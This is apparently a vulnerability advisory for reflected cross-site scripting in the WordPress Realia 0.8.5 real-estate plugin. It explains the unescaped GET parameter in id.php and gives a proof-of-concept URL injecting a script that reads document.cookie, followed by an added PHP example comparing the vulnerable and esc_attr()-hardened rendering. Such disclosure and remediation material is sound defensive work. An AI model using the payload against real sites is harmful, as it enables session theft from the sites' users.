WordPress Realia 0.8.5 Cross Site Scripting
Posted on 04 June 2016
Exploit Title : WordPress plugin 'Realia' (real estate solution) multiple XSS vulnerability
Author : WICS
Date : 03/06/2016
Software Link : https://wordpress.org/plugins/realia/
Tested Version: 0.8.5

Overview:
Realia is a WordPress plugin which provides real estate service functionality such as searching for and selling property. The plugin's property search form is vulnerable to Cross Site Scripting. The template files inside the directory realia/templates/widgets/filter-fields display the search form on the user end. The scripts in that directory do not encode user-supplied data from GET variables before printing it to the search page, which causes the XSS vulnerability.

For example, in id.php, lines 7 to 9, the input text field code is:

<input type="text" name="filter-id" class="form-control" <?php if ( 'placeholders' == $input_titles ) : ?>placeholder="<?php echo __( 'Property ID', 'realia' ); ?>"<?php endif; ?> value="<?php echo ! empty( $_GET['filter-id'] ) ? $_GET['filter-id'] : ''; ?>"

On line 9 the GET variable filter-id is passed straight into the value attribute with no output encoding, which results in XSS.

POC
http://127.0.0.1/wordpress/properties/?filter-contract=RENT&filter-id="><script>alert(document.cookie);</script>&filter-location=&filter-property-type=&filter-amenity=&filter-status=&filter-contract=&filter-material=&filter-price-from=1337'&filter-price-to=&filter-rooms=&filter-baths=&rent_filter-beds=&filter-year-built=&filter-home-area-from=&filter-home-area-to=&filter-lot-area-from=&filter-lot-area-to=&filter-garages=
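The following is an added example, not code from the Realia plugin or from the advisory author. It reproduces the vulnerable pattern from id.php (a raw $_GET value echoed into a value="" attribute) next to the hardened form, which escapes the value for HTML attribute context with WordPress's esc_attr() before output. The function names render_filter_id_vulnerable and render_filter_id_fixed are invented for this demonstration, and the esc_attr() fallback is a stand-in so the script runs outside WordPress; the request array is constructed to match the advisory's PoC query string.

```php
<?php
// Added example: vulnerable vs. hardened rendering of the filter-id field.
// Not the plugin's code; names and the constructed request are assumptions.

// Stand-in for WordPress's esc_attr() so this runs from the PHP CLI without
// WordPress loaded (assumption: same handling of & < > " ' as the real one).
if ( ! function_exists( 'esc_attr' ) ) {
    function esc_attr( $text ) {
        return htmlspecialchars( (string) $text, ENT_QUOTES | ENT_HTML5, 'UTF-8' );
    }
}

// Vulnerable pattern from id.php: the GET value is concatenated into the
// attribute unchanged, so a double quote in the input closes the attribute.
function render_filter_id_vulnerable( array $get ) {
    $value = ! empty( $get['filter-id'] ) ? $get['filter-id'] : '';
    return '<input type="text" name="filter-id" class="form-control" value="' . $value . '">';
}

// Hardened version: escape for attribute context at the point of output.
// Quotes and angle brackets become entities, so the input can never leave
// the value="" attribute regardless of what the request carried.
function render_filter_id_fixed( array $get ) {
    $value = ! empty( $get['filter-id'] ) ? esc_attr( $get['filter-id'] ) : '';
    return '<input type="text" name="filter-id" class="form-control" value="' . $value . '">';
}

// Constructed request, shaped like the filter-id parameter in the advisory's PoC.
$request = array( 'filter-id' => '"><script>alert(document.cookie);</script>' );

echo "Vulnerable output:\n" . render_filter_id_vulnerable( $request ) . "\n\n";
echo "Hardened output:\n" . render_filter_id_fixed( $request ) . "\n\n";

// Quick regression check a maintainer can keep in a test: the hardened markup
// must contain no raw <script> tag and must still be a single input element.
$fixed = render_filter_id_fixed( $request );
$tag_leaked = ( strpos( $fixed, '<script>' ) !== false );
$single_tag = ( substr_count( $fixed, '<' ) === 1 );
echo ( ! $tag_leaked && $single_tag )
    ? "OK: payload stays inside the value attribute\n"
    : "FAIL: untrusted input reached the page unescaped\n";
```

Run it with `php example.php`. The same fix applies to every template in the filter-fields directory that echoes a $_GET value: wrap the value in esc_attr() when it lands in an attribute, or esc_html() when it lands in element text, since the correct escaper depends on the output context rather than on the source of the data.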